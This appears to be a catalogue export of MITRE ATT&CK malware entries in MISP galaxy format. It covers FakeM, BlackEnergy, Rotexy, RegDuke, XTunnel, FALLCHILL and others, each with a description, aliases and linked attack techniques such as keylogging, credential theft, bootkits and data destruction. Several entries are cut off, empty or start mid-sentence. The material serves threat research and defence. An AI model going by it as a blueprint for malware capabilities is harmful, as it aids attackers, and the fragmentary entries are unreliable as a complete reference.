[FakeM](https://attack.mitre.org/software/S0076) is a shellcode-based Windows backdoor that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: `misp-galaxy:mitre-malware="FakeM - S0076"`

**FakeM - S0076** is also known as:

- FakeM

**FakeM - S0076** has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001"` with `estimative-`
**pngdowner - S0067**

[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-execute" utility. (Citation: CrowdStrike Putter Panda)

The tag is: `misp-galaxy:mitre-malware="pngdowner - S0067"`

**pngdowner - S0067** is also known as:

- pngdowner

**pngdowner - S0067** has relationships with:

- similar: `misp-galaxy:malpedia="pngdowner"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001"` with estimative-language:likelihood-probability="almost-certain"
second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm)

The tag is: `misp-galaxy:mitre-malware="ZLib - S0086"`

ZLib - S0086 is also known as:

- ZLib

ZLib - S0086 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"

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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0068">httpclient</a></td>
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<tr>
<td><a href="https://attack.mitre.org/software/S0068">httpclient</a> is malware used by <a href="https://attack.mitre.org/groups/G0024">Putter Panda</a>. It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)</td>
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| 2474 |
The tag is: `misp-galaxy:mitre-malware="httpclient - S0068"`

httpclient - S0068 is also known as:

- httpclient

httpclient - S0068 has relationships with:


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<td><a href="https://attack.mitre.org/software/S0068">https://attack.mitre.org/software/S0068</a></td>
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<tr>
<td><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></td>
</tr>
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</table>

**BLACKCOFFEE - S0069**

[BLACKCOFFEE](https://attack.mitre.org/software/S0069) is malware that has been used by several Chinese groups since at least 2013. (Citation: FireEye APT17) (Citation: FireEye Periscope March 2018)

The tag is: `misp-galaxy:mitre-malware="BLACKCOFFEE - S0069"`

BLACKCOFFEE - S0069 is also known as:

- BLACKCOFFEE

BLACKCOFFEE - S0069 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0069">https://attack.mitre.org/software/S0069</a></td>
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</table>

**CallMe - S0077**

[CallMe](https://attack.mitre.org/software/S0077) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. (Citation: Scarlet Mimic Jan 2016)

The tag is: `misp-galaxy:mitre-malware="CallMe - S0077"`

CallMe - S0077 is also known as:

• CallMe

CallMe - S0077 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0077">https://attack.mitre.org/software/S0077</a></td>
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<td><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></td>
</tr>
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</table>

**Psylo - S0078**

[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM]([https://attack.mitre.org/software/S0076](https://attack.mitre.org/software/S0076)). (Citation: Scarlet Mimic Jan 2016)

The tag is: `misp-galaxy:mitre-malware="Psylo - S0078"`
Psylo - S0078 is also known as:

- Psylo

Psylo - S0078 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0078">https://attack.mitre.org/software/S0078</a></td>
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**MobileOrder - S0079**

[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)

The tag is: **misp-galaxy:mitre-malware="MobileOrder - S0079"**

MobileOrder - S0079 is also known as:

- MobileOrder

MobileOrder - S0079 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
Table 4583. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0079">https://attack.mitre.org/software/S0079</a></td>
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<td><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></td>
</tr>
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</table>

Kasidet - S0088

[Kasidet](https://attack.mitre.org/software/S0088) is a backdoor that has been dropped by using malicious VBA macros. (Citation: Zscaler Kasidet)

The tag is: `misp-galaxy:mitre-malware="Kasidet - S0088"`

Kasidet - S0088 is also known as:

- Kasidet

Kasidet - S0088 has relationships with:

- similar: `misp-galaxy:malpedia="Neutrino"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
BlackEnergy - S0089

[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)

The tag is: `misp-galaxy:mitre-malware="BlackEnergy - S0089"`

BlackEnergy - S0089 is also known as:

- BlackEnergy
- Black Energy

BlackEnergy - S0089 has relationships with:

- similar: `misp-galaxy:tool="BlackEnergy"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="BlackEnergy"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"` with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
H1N1 - S0132

[H1N1](https://attack.mitre.org/software/S0132) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)

The tag is: `misp-galaxy:mitre-malware="H1N1 - S0132"`

H1N1 - S0132 is also known as:

- H1N1

H1N1 - S0132 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0132">https://attack.mitre.org/software/S0132</a></td>
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</table>

**ROCKBOOT - S0112**

[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)

The tag is: *misp-galaxy:mitre-malware="ROCKBOOT - S0112"*

ROCKBOOT - S0112 is also known as:

• ROCKBOOT

ROCKBOOT - S0112 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0112">https://attack.mitre.org/software/S0112</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html">https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html</a></td>
</tr>
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</table>

**Linfo - S0211**

[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)

The tag is: *misp-galaxy:mitre-malware="Linfo - S0211"*

Linfo - S0211 is also known as:

• Linfo

Linfo - S0211 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-
TINYTYPHON - S0131

[TINYTYPHON](https://attack.mitre.org/software/S0131) is a backdoor that has been used by the actors responsible for the MONSOON campaign. The majority of its code was reportedly taken from the MyDoom worm. (Citation: Forcepoint Monsoon)

The tag is: `misp-galaxy:mitre-malware="TINYTYPHON - S0131"

TINYTYPHON - S0131 is also known as:

- TINYTYPHON

TINYTYPHON - S0131 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"
Prikormka - S0113

[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)

The tag is: `misp-galaxy:mitre-malware="Prikormka - S0113"`

Prikormka - S0113 is also known as:

- Prikormka

Prikormka - S0113 has relationships with:

- similar: `misp-galaxy:tool="Prikormka"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"` with estimative-language:likelihood-probability="almost-certain"
YiSpecter - S0311

[YiSpecter](https://attack.mitre.org/software/S0311) iOS malware that affects both jailbroken and non-jailbroken iOS devices. It is also unique because it abuses private APIs in the iOS system to implement functionality. (Citation: PaloAlto-YiSpecter)

The tag is: `misp-galaxy:mitre-malware="YiSpecter - S0311"`

YiSpecter - S0311 is also known as:

- YiSpecter

YiSpecter - S0311 has relationships with:

**BOOTRASH - S0114**

[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that targets Windows operating systems. It has been used by threat actors that target the financial sector. (Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)

The tag is: `misp-galaxy:mitre-malware="BOOTRASH - S0114"`

**BOOTRASH - S0114 is also known as:**

- BOOTRASH

**BOOTRASH - S0114 has relationships with:**

- uses: `misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005"` with estimative-language:likelihood-probability="almost-certain"

---

**Rotexy - S0411**

[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality. (Citation: securelist rotexy 2018)

The tag is: `misp-galaxy:mitre-malware="Rotexy - S0411"`

**Rotexy - S0411 is also known as:**

- Rotexy
Rotexy - S0411 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0411">https://attack.mitre.org/software/S0411</a></td>
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</table>
HALFBAKED - S0151

HALFBAKED ([HALFBAKED](https://attack.mitre.org/software/S0151)) is a malware family consisting of multiple components intended to establish persistence in victim networks. (Citation: FireEye FIN7 April 2017)

The tag is: `misp-galaxy:mitre-malware="HALFBAKED - S0151"`

HALFBAKED - S0151 is also known as:

- HALFBAKED

HALFBAKED - S0151 has relationships with:

- similar: `misp-galaxy:tool="VB Flash"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with `estimative-language:likelihood-probability="almost-certain"`

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<td><a href="https://attack.mitre.org/software/S0151">https://attack.mitre.org/software/S0151</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></td>
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</table>

Crimson - S0115

[Crimson](https://attack.mitre.org/software/S0115) is malware used as part of a campaign known as Operation Transparent Tribe that targeted Indian diplomatic and military victims. (Citation: Proofpoint Operation Transparent Tribe March 2016)

The tag is: `misp-galaxy:mitre-malware="Crimson - S0115"`

Crimson - S0115 is also known as:

- Crimson
- MSIL/Crimson
Crimson - S0115 has relationships with:

- similar: misp-galaxy:rat="Crimson" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:tool="Crimson" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Crimson RAT" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0115">https://attack.mitre.org/software/S0115</a></td>
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RegDuke - S0511

[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017.
RegDuke (https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost. (Citation: ESET Dukes October 2019)

The tag is: *misp-galaxy:mitre-malware=*RegDuke - S0511*

RegDuke - S0511 is also known as:

- RegDuke

RegDuke - S0511 has relationships with:

- uses:  *misp-galaxy:mitre-attack-pattern=*PowerShell - T1059.001* with estimative-language:likelihood-probability="almost-certain"
- uses:  *misp-galaxy:mitre-attack-pattern=*Steganography - T1027.003* with estimative-language:likelihood-probability="almost-certain"
- uses:  *misp-galaxy:mitre-attack-pattern=*Ingress Tool Transfer - T1105* with estimative-language:likelihood-probability="almost-certain"
- uses:  *misp-galaxy:mitre-attack-pattern=*Bidirectional Communication - T1102.002* with estimative-language:likelihood-probability="almost-certain"
- uses:  *misp-galaxy:mitre-attack-pattern=*Deobfuscate/Decode Files or Information - T1140* with estimative-language:likelihood-probability="almost-certain"
- uses:  *misp-galaxy:mitre-attack-pattern=*Modify Registry - T1112* with estimative-language:likelihood-probability="almost-certain"
- uses:  *misp-galaxy:mitre-attack-pattern=*Obfuscated Files or Information - T1027* with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0511">https://attack.mitre.org/software/S0511</a></td>
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**XAgentOSX - S0161**

[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)

The tag is: *misp-galaxy:mitre-malware=*XAgentOSX - S0161*

XAgentOSX - S0161 is also known as:

- XAgentOSX
OSX.Sofacy

XAgentOSX - S0161 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0161">https://attack.mitre.org/software/S0161</a></td>
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Felismus - S0171

[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)

The tag is: misp-galaxy:mitre-malware="Felismus - S0171"

Felismus - S0171 is also known as:

- Felismus

Felismus - S0171 has relationships with:
• similar: misp-galaxy:malpedia="Felismus" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

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**XTunnel - S0117**

[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-malware="XTunnel - S0117"

XTunnel - S0117 is also known as:

• XTunnel
Trojan.Shunnael
X-Tunnel
XAPS

XTunnel - S0117 has relationships with:

- similar: misp-galaxy:tool="X-Tunnel" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="XTunnel" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0117">https://attack.mitre.org/software/S0117</a></td>
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<td><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></td>
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FALLCHILL - S0181

[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)
The tag is: `misp-galaxy:mitre-malware="FALLCHILL - S0181"`

FALLCHILL - S0181 is also known as:

- FALLCHILL

FALLCHILL - S0181 has relationships with:

- similar: `misp-galaxy:rat="FALLCHILL"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:malpedia="Volgmer"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:tool="Volgmer"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with `estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.us-cert.gov/ncas/alerts/TA17-318A">https://www.us-cert.gov/ncas/alerts/TA17-318A</a></td>
</tr>
</tbody>
</table>

**Nidiran - S0118**

[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)

The tag is: `misp-galaxy:mitre-malware="Nidiran - S0118"`

Nidiran - S0118 is also known as:
Nidiran - S0118 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 4601. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0118">https://attack.mitre.org/software/S0118</a></td>
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<tr>
<td><a href="http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates">http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates</a></td>
</tr>
</tbody>
</table>

Concipit1248 - S0426

[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)

The tag is: `misp-galaxy:mitre-malware="Concipit1248 - S0426"`

Concipit1248 - S0426 is also known as:

- Concipit1248
- Corona Updates

Concipit1248 - S0426 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
CORALDECK  - S0212

[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: *misp-galaxy:mitre-malware="CORALDECK - S0212"*

CORALDECK - S0212 is also known as:

- CORALDECK

CORALDECK - S0212 has relationships with:

- similar: [misp-galaxy:tool="CORALDECK" with estimative-language:likelihood-probability="likely"
- uses: [misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
- uses: [misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Umbreon  - S0221

A Linux rootkit that provides backdoor access and hides from defenders.

The tag is: *misp-galaxy:mitre-malware="Umbreon - S0221"*

Umbreon - S0221 is also known as:

- Umbreon
Umbreon - S0221 has relationships with:

- similar: misp-galaxy:tool="Umbreon" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="Umbreon" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 4604. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0221">https://attack.mitre.org/software/S0221</a></td>
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</table>

DOGCALL - S0213

[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="DOGCALL - S0213"

DOGCALL - S0213 is also known as:

- DOGCALL

DOGCALL - S0213 has relationships with:

- similar: misp-galaxy:tool="DOGCALL" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
